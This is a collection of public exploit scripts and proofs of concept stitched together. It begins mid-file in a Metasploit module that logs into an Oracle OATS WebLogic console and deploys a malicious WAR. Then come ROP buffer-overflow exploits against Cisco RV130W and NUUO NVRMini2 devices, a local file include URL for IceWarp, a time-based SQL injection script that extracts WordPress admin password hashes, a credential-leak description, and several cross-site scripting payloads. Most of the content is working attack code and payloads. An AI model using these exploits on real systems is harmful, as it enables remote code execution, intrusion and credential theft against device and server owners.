class LoginSpec
attr_accessor :admin_console_session
end
def login_spec
@login_spec ||= LoginSpec.new
end
class OatsWarPayload < MetasploitModule
attr_reader :name
attr_reader :war
def initialize(payload)
@name = [Faker::App.name, Rex::Text.rand_name].sample
@war = payload.encoded_war(app_name: name).to_s
end
end
def default_oats_path
datastore['DefaultOatsPath']
end
def war_payload
@war_payload ||= OatsWarPayload.new(payload)
end
def set_frsc
value = get_deploy_frsc
@frsc = value
end
def check
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, 'console', 'login', 'LoginForm.jsp')
})
if res && res.body.include?('Oracle WebLogic Server Administration Console')
return Exploit::CheckCode::Detected
end
Exploit::CheckCode::Safe
end
def set_admin_console_session(res)
cookie = res.get_cookies
admin_console_session = cookie.scan(/ADMINCONSOLESESSION=(.+);/).flatten.first
vprint_status("Token for console session is: #{admin_console_session}")
login_spec.admin_console_session = admin_console_session
end
def is_logged_in?(res)
html = res.get_html_document
a_element = html.at('a')
if a_element.respond_to?(:attributes) && a_element.attributes['href']
link = a_element.attributes['href'].value
return URI(link).request_uri == '/console'
end
false
end
def do_login
uri = normalize_uri(target_uri.path, 'console', 'login', 'LoginForm.jsp')
res = send_request_cgi({
'method' => 'GET',
'uri' => uri
})
fail_with(Failure::Unknown, 'No response from server') unless res
set_admin_console_session(res)
uri = normalize_uri(target_uri.path, 'console', 'j_security_check')
res = send_request_cgi({
'method' => 'POST',
'uri' => uri,
'cookie' => "ADMINCONSOLESESSION=#{login_spec.admin_console_session}",
'vars_post' =>
{
'j_username' => datastore['OATSUSERNAME'],
'j_password' => datastore['OATSPASSWORD'],
'j_character_encoding' => 'UTF-8'
}
})
fail_with(Failure::Unknown, 'No response while trying to log in') unless res
fail_with(Failure::NoAccess, 'Failed to login') unless is_logged_in?(res)
store_valid_credential(user: datastore['OATSUSERNAME'], private: datastore['OATSPASSWORD'])
set_admin_console_session(res)
end
def get_deploy_frsc
# First we are just going through the pages in a specific order to get the FRSC value
# we need to prepare uploading the WAR file.
res = nil
requests =
[
{ path: 'console/', vars: {} },
{ path: 'console/console.portal', vars: {'_nfpb'=>"true"} },
{ path: 'console/console.portal', vars: {'_nfpb'=>"true", '_pageLabel' => 'HomePage1'} }
]
requests.each do |req|
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, req[:path]),
'cookie' => "ADMINCONSOLESESSION=#{login_spec.admin_console_session}",
'vars_get' => req[:vars]
})
fail_with(Failure::Unknown, 'No response while retrieving FRSC') unless res
end
html = res.get_html_document
hidden_input = html.at('input[@name="ChangeManagerPortletfrsc"]')
frsc_attr = hidden_input.respond_to?(:attributes) ? hidden_input.attributes['value'] : nil
frsc_attr ? frsc_attr.value : ''
end
def do_select_upload_action
action = '/com/bea/console/actions/app/install/selectUploadApp'
app_path = Rex::FileUtils.normalize_win_path(default_oats_path, 'oats\\servers\\AdminServer\\upload')
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'console', 'console.portal'),
'cookie' => "ADMINCONSOLESESSION=#{login_spec.admin_console_session}",
'vars_get' =>
{
'AppApplicationInstallPortlet_actionOverride' => action
},
'vars_post' =>
{
'AppApplicationInstallPortletselectedAppPath' => app_path,
'AppApplicationInstallPortletfrsc' => frsc
}
})
fail_with(Failure::Unknown, "No response from #{action}") unless res
end
def do_upload_app_action
action = '/com/bea/console/actions/app/install/uploadApp'
ctype = 'application/octet-stream'
app_cname = 'AppApplicationInstallPortletuploadAppPath'
plan_cname = 'AppApplicationInstallPortletuploadPlanPath'
frsc_cname = 'AppApplicationInstallPortletfrsc'
war = war_payload.war
war_name = war_payload.name
post_data = Rex::MIME::Message.new
post_data.add_part(war, ctype, 'binary', "form-data; name=\"#{app_cname}\"; filename=\"#{war_name}.war\"")
post_data.add_part('', ctype, nil, "form-data; name=\"#{plan_cname}\"; filename=\"\"")
post_data.add_part(frsc, nil, nil, "form-data; name=\"#{frsc_cname}\"")
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'console', 'console.portal'),
'cookie' => "ADMINCONSOLESESSION=#{login_spec.admin_console_session}",
'vars_get' =>
{
'AppApplicationInstallPortlet_actionOverride' => action
},
'ctype' => "multipart/form-data; boundary=#{post_data.bound}",
'data' => post_data.to_s
})
fail_with(Failure::Unknown, "No response from #{action}") unless res
print_response_message(res)
end
def do_app_select_action
action = '/com/bea/console/actions/app/install/appSelected'
war_name = war_payload.name
app_path = Rex::FileUtils.normalize_win_path(default_oats_path, "oats\\servers\\AdminServer\\upload\\#{war_name}.war")
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'console', 'console.portal'),
'cookie' => "ADMINCONSOLESESSION=#{login_spec.admin_console_session}",
'vars_get' =>
{
'AppApplicationInstallPortlet_actionOverride' => action
},
'vars_post' =>
{
'AppApplicationInstallPortletselectedAppPath' => app_path,
'AppApplicationInstallPortletfrsc' => frsc
}
})
fail_with(Failure::Unknown, "No response from #{action}") unless res
print_response_message(res)
end
def do_style_select_action
action = '/com/bea/console/actions/app/install/targetStyleSelected'
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'console', 'console.portal'),
'cookie' => "ADMINCONSOLESESSION=#{login_spec.admin_console_session}",
'vars_get' =>
{
'AppApplicationInstallPortlet_actionOverride' => action
},
'vars_post' =>
{
'AppApplicationInstallPortlettargetStyle' => 'Application',
'AppApplicationInstallPortletfrsc' => frsc
}
})
fail_with(Failure::Unknown, "No response from #{action}") unless res
end
def do_finish_action
action = '/com/bea/console/actions/app/install/finish'
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'console', 'console.portal'),
'cookie' => "ADMINCONSOLESESSION=#{login_spec.admin_console_session}",
'vars_get' =>
{
'AppApplicationInstallPortlet_actionOverride' => action
},
'vars_post' =>
{
'AppApplicationInstallPortletname' => war_payload.name,
'AppApplicationInstallPortletsecurityModel' => 'DDOnly',
'AppApplicationInstallPortletstagingStyle' => 'Default',
'AppApplicationInstallPortletplanStagingStyle' => 'Default',
'AppApplicationInstallPortletfrsc' => frsc
}
})
fail_with(Failure::Unknown, "No response from #{action}") unless res
print_response_message(res)
# 302 is a good enough indicator of a successful upload, otherwise
# the server would actually return a 200 with an error message.
res.code == 302
end
def print_response_message(res)
html = res.get_html_document
message_div = html.at('div[@class="message"]')
if message_div
msg = message_div.at('span').text
print_status("Server replies: #{msg.inspect}")
end
end
def deploy_war
set_frsc
print_status("FRSC value: #{frsc}")
do_select_upload_action
do_upload_app_action
do_app_select_action
do_style_select_action
do_finish_action
end
def goto_war(name)
print_good("Operation \"#{name}\" is a go!")
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, name)
})
print_status("Code #{res.code} on \"#{name}\" request") if res
end
def undeploy_war
war_name = war_payload.name
handle = 'com.bea.console.handles.JMXHandle("com.bea:Name=oats,Type=Domain")'
contents = %Q|com.bea.console.handles.AppDeploymentHandle("com.bea:Name=#{war_name},Type=AppDeployment")|
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'console', 'console.portal'),
'cookie' => "ADMINCONSOLESESSION=#{login_spec.admin_console_session}",
'vars_get' =>
{
'AppApplicationUninstallPortletreturnTo' => 'AppDeploymentsControlPage',
'AppDeploymentsControlPortlethandle' => handle
},
'vars_post' =>
{
# For some reason, the value given to the server is escapped twice.
# The Metasploit API should do it at least once.
'AppApplicationUninstallPortletchosenContents' => CGI.escape(contents),
'_pageLabel' => 'AppApplicationUninstallPage',
'_nfpb' => 'true',
'AppApplicationUninstallPortletfrsc' => frsc
}
})
if res && res.code == 302
print_good("Successfully undeployed #{war_name}.war")
else
print_warning("Unable to successfully undeploy #{war_name}.war")
print_warning('You may want to do so manually.')
end
end
def cleanup
undeploy_war if is_cleanup_ready
super
end
def setup
@is_cleanup_ready = false
super
end
def exploit
unless check == Exploit::CheckCode::Detected
print_status('Target does not have the login page we are looking for.')
return
end
do_login
print_good("Logged in as #{datastore['OATSUSERNAME']}:#{datastore['OATSPASSWORD']}")
print_status("Ready for war. Codename \"#{war_payload.name}\" at #{war_payload.war.length} bytes")
result = deploy_war
if result
@is_cleanup_ready = true
goto_war(war_payload.name)
end
end
attr_reader :frsc
attr_reader :is_cleanup_ready
end
# Exploit Title: IceWarp <=10.4.4 local file include
# Date: 02/06/2019
# Exploit Author: JameelNabbo
# Website: uitsec.com
# Vendor Homepage: http://www.icewarp.com
# Software Link: https://www.icewarp.com/downloads/trial/
# Version: 10.4.4
# Tested on: Windows 10
# CVE: CVE-2019-12593
POC:
http://example.com/webmail/calendar/minimizer/index.php?style=[LFI]
Example:
http://example.com/webmail/calendar/minimizer/index.php?style=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini
#!/usr/bin/python
# Exploit Title: Cisco RV130W Remote Stack Overflow
# Google Dork: n/a
# Date: Advisory Published: Feb 2019
# Exploit Author: @0x00string
# Vendor Homepage: cisco.com
# Software Link: https://www.cisco.com/c/en/us/products/routers/rv130w-wireless-n-multifunction-vpn-router/index.html
# Version: 1.0.3.44 and prior
# Tested on: 1.0.3.44
# CVE : CVE-2019-1663
#
# 0x357fc000 - libc base addr
# 0x35849144 - system() addr
#
# 0x0002eaf8 / 0x3582AAF8: pop {r4, r5, lr}; add sp, sp, #8; bx lr;
# 0x0000c11c / 0x3580811C: mov r2, r4; mov r0, r2; pop {r4, r5, r7, pc};
# 0x00041308 / 0x3583D308: mov r0, sp; blx r2;
#
# gadget 1 system() junk gadget 2 junk junk junk junk junk gadget 3 text
# [0x3582AAF8][0x35849144][AAAA][0x3580811C][BBBB][CCCC][DDDD][EEEE][FFFF][0x3583D308][command]
#
# curl -k -X 'POST' --data "submit_button=login&submit_type=&gui_action=&default_login=1&wait_time=0&change_action=&enc=1&user=cisco&pwd=UUUUZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZVVVVWWWWXXXXYYYY`printf "\xf8\xaa\x82\x35\x44\x91\x84\x35AAAA\x1c\x81\x80\x35BBBBCCCCDDDDEEEEFFFF\x08\xd3\x83\x35ping 192.168.1.100\x00"`&sel_lang=EN" 'https://192.168.1.1:443/login.cgi'
#!/usr/bin/python
import requests
def banner():
print '''
@0x00string
0000000000000
0000000000000000000 00
00000000000000000000000000000
0000000000000000000000000000000
000000000 0000000000
00000000 0000000000
0000000 000000000000
0000000 000000000000000
000000 000000000 000000
0000000 000000000 000000
000000 000000000 000000
000000 000000000 000000
000000 00000000 000000
000000 000000000 000000
0000000 000000000 0000000
000000 000000000 000000
0000000000000000 0000000
0000000000000 0000000
00000000000 00000000
00000000000 000000000
0000000000000000000000000000000
00000000000000000000000000000
000 0000000000000000000
0000000000000
https://github.com/0x00string/oldays/blob/master/CVE-2019-1663.py
'''
def main():
banner()
command = "ping 192.168.1.100\x00"
print ("Sending exploit to execute [" + command + "]\n")
rop = "\xf8\xaa\x82\x35"+"\x44\x91\x84\x35"+"AAAA"+"\x1c\x81\x80\x35"+"BBBB"+"CCCC"+"DDDD"+"EEEE"+"FFFF"+"\x08\xd3\x83\x35"
payload = ("Z" * 446) + rop + command
url = "https://192.168.1.100:443/login.cgi"
data = {'submit_button': 'login','submit_type': '','gui_action': '','default_login': '1','wait_time': '0','change_action': '','enc': '1','user': 'cisco','pwd': payload,'sel_lang': 'EN'}
r = requests.post(url, payload=data)
if __name__ == "__main__":
main()
#!/usr/bin/python
# Exploit Title: NUUO NVRMini2 3.9.1 'sscanf' stack overflow
# Google Dork: n/a
# Date: Advisory Published: Nov 18
# Exploit Author: @0x00string
# Vendor Homepage: nuuo.com
# Software Link: https://www.nuuo.com/ProductNode.php?node=2
# Version: 3.9.1 and prior
# Tested on: 3.9.1
# CVE : CVE-2018-19864
#
# [ leading / ]
# [ Padding x 335 ]
# [ original value at stack pointer + 158 ]
# [ padding x 80 ]
# [ address of (pop {r3,lr} ; bx lr) ]
# [ system() address ]
# [ address of (mov r0,sp ; blx r3) ]
# [ command to execute ]
def banner():
print '''
@0x00string
0000000000000
0000000000000000000 00
00000000000000000000000000000
0000000000000000000000000000000
000000000 0000000000
00000000 0000000000
0000000 000000000000
0000000 000000000000000
000000 000000000 000000
0000000 000000000 000000
000000 000000000 000000
000000 000000000 000000
000000 00000000 000000
000000 000000000 000000
0000000 000000000 0000000
000000 000000000 000000
0000000000000000 0000000
0000000000000 0000000
00000000000 00000000
00000000000 000000000
0000000000000000000000000000000
00000000000000000000000000000
000 0000000000000000000
0000000000000
https://github.com/0x00string/oldays/blob/master/CVE-2018-19864.py
'''
def usage ():
print ("python script.py <args>\n"
" -h, --help: Show this message\n"
" -a, --rhost: Target IP address\n"
" -b, --rport: Target Port - default 5150\n"
" -c, --command: Command to execute\n"
"\n"
"Example:\n"
"python script.py -a 10.10.10.10\n"
"python script.py -a 10.10.10.10 -b 1234 -c reboot\n")
exit()
def main():
rhost = None;
rport = "5150";
command = "{/bin/touch,/tmp/hax}"
banner()
options, remainder = getopt.getopt(sys.argv[1:], 'a:b:c:fh', ['rhost=','rport=','command=','help'])
for opt, arg in options:
if opt in ('-h', '--help'):
usage()
elif opt in ('-a','--rhost'):
rhost = arg;
elif opt in ('-b','--rport'):
rport = arg;
elif opt in ('-c','--command'):
command = arg;
print ("Sending exploit to execute [" + command + "]\n")
buf = "GET /" + ("Z" * 335) + "\x30\x2a\x17\x45" + ("Y" * 80) + "\x08\xfc\x78\x40" +
"\x44\xe0\x17\x40" + "\xcc\xb7\x77\x40" + command + " HTTP/1.1\r\nHost: " +
"http://" + rhost + ":" + rport + "\r\n\r\n"
sock = socket(AF_INET, SOCK_STREAM)
sock.settimeout(30)
sock.connect((target_ip,int(target_port)))
sock.send(buf)
print ("done\n")
if __name__ == "__main__":
main()
# Exploit Title: AUO Solar Data Recorder - Incorrect Access Control
# Date: 2019-04-16
# Exploit Author: Luca.Chiou
# Vendor Homepage: https://www.auo.com/zh-TW
# Version: AUO Solar Data Recorder all versions prior to v1.3.0
# Tested on: It is a proprietary devices: https://solar.auo.com/en-global/Support_Download_Center/index
# CVE: CVE-2019-11367
# 1. Description:
# In AUO Solar Data Recorder web page, it's use HTTP Basic Access Authentication.
# Once user access the files which are under path http://<host>/protect/,
# the website will response the plaintext account and password in WWW-Authenticate attribute.
# Attackers is capable to login AUO Solar Data Recorder successfully.
# 2. Proof of Concept:
# Access the files which are under path http://<host>/protect/ of AUO Solar Data Recorder.
# The website use HTTP Basic Access Authentication,
# and response the plaintext account and password in WWW-Authenticate attribute.
# By using the account and password in HTTP response,
# anyone can login AUO Solar Data Recorder successfully.
# -*- coding: utf-8 -*-
# Exploit Title: WordPress Plugin Form Maker 1.13.3 - SQL Injection
# Date: 22-03-2019
# Exploit Author: Daniele Scanu @ Certimeter Group
# Vendor Homepage: https://10web.io/plugins/
# Software Link: https://wordpress.org/plugins/form-maker/
# Version: 1.13.3
# Tested on: Ubuntu 18.04
# CVE : CVE-2019-10866
import requests
import time
url_vuln = 'http://localhost/wordpress/wp-admin/admin.php?page=submissions_fm&task=display¤t_id=2&order_by=group_id&asc_or_desc='
session = requests.Session()
dictionary = '@._-$/\\"£%&;§+*1234567890qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM'
flag = True
username = "username"
password = "password"
temp_password = ""
TIME = 0.5
def login(username, password):
payload = {
'log': username,
'pwd': password,
'wp-submit': 'Login',
'redirect_to': 'http://localhost/wordpress/wp-admin/',
'testcookie': 1
}
session.post('http://localhost/wordpress/wp-login.php', data=payload)
def print_string(str):
print "\033c"
print str
def get_admin_pass():
len_pwd = 1
global flag
global temp_password
while flag:
flag = False
ch_temp = ''
for ch in dictionary:
print_string("[*] Password dump: " + temp_password + ch)
ch_temp = ch
start_time = time.time()
r = session.get(url_vuln + ',(case+when+(select+ascii(substring(user_pass,' + str(len_pwd) + ',' + str(len_pwd) + '))+from+wp_users+where+id%3d1)%3d' + str(ord(ch)) + '+then+(select+sleep(' + str(TIME) + ')+from+wp_users+limit+1)+else+2+end)+asc%3b')
elapsed_time = time.time() - start_time
if elapsed_time >= TIME:
flag = True
break
if flag:
temp_password += ch_temp
len_pwd += 1
login(username, password)
get_admin_pass()
print_string("[+] Password found: " + temp_password)
# Exploit Title: Zoho ManageEngine ServiceDesk Plus 9.3 Cross-Site Scripting via SearchN.do
# Date: 2019-06-04
# Exploit Author: Tarantula Team - VinCSS (a member of Vingroup)
# Vendor Homepage: https://www.manageengine.com/products/service-desk
# Version: Zoho ManageEngine ServiceDesk Plus 9.3
# CVE : CVE-2019-12542
An issue was discovered in Zoho ManageEngine ServiceDesk Plus 9.3. There is XSS via the SearchN.do userConfigID parameter.
Attack vector: domain/SearchN.do?searchText=a&SELECTEDSITEID=1&SELECTEDSITENAME=&configID=0&SELECTSITE=qc_siteID&submitbutton=Go&userConfigID=21111111ucgol"><img src%3da onerror%3dalert('XSS')>qzmm3u7id8z&selectName=Site
PoC: https://drive.google.com/file/d/1aJN6GudSd7WWckXWxA5nelM48Xib9eS9/view
# Exploit Title: Zoho ManageEngine ServiceDesk Plus 9.3 Cross-Site Scripting via PurchaseRequest.do
# Date: 2019-06-04
# Exploit Author: Tarantula Team - VinCSS (a member of Vingroup)
# Vendor Homepage: https://www.manageengine.com/products/service-desk
# Version: Zoho ManageEngine ServiceDesk Plus 9.3
# CVE : CVE-2019-12543
Information Description: An issue was discovered in Zoho ManageEngine ServiceDesk Plus 9.3. There is XSS via the PurchaseRequest.do serviceRequestId parameter.
Attack vector: domain/PurchaseRequest.do?operation=getAssociatedPrsForSR&serviceRequestId=g24aj%3Cimg%20src%3da%20onerror%3dalert(%27XSS%27)%3Eqdaxl
PoC: https://drive.google.com/file/d/1pHeq446oNonw5ZJ53idKhP8gC-9CZtQW/view
# Exploit Title: Zoho ManageEngine ServiceDesk Plus 9.3 Cross-Site Scripting via SiteLookup.do
# Date: 2019-06-04
# Exploit Author: Tarantula Team - VinCSS (a member of Vingroup)
# Vendor Homepage: https://www.manageengine.com/products/service-desk
# Version: Zoho ManageEngine ServiceDesk Plus 9.3
# CVE : CVE-2019-12538
Information Description: An issue was discovered in Zoho ManageEngine ServiceDesk Plus 9.3. There is XSS via the SiteLookup.do qc_siteID parameter
Attack vector: domain/SiteLookup.do?configID=0&SELECTSITE=qc_siteID"/><svg onload=alert('XSS')>&userConfigID=21111111&SELECTEDSITEID=1&SELECTEDSITENAME=
PoC: https://drive.google.com/file/d/1Oo_lC_XCtAiF2Gvx_ZoS8Yqwunc1U_57/view